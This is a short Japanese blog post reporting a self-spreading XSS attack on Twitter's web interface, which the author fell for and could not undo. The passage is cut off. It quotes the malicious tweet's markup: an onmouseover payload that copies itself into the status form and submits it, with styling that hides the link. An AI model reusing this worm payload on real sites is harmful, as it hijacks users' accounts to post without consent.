本日夕方から、TwitterのXSS(Cross Site Scripting:クロスサイトスクリプティング)脆弱性を突いた攻撃がすさまじいペースで広がっています。 私もWebで見る派なので、踏んでしまいました。 リツイートされたものを解除しようにもログインできず、公式ReTweetはWebでしか解除できないので困っています。 公式ReTweetの仕様上の問題点も活用した、なかなか鮮やかな手口ですね。 問題のツイートの一例が↓です。 <span class="entry-content"> <a href="http://a.no/@" onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/" c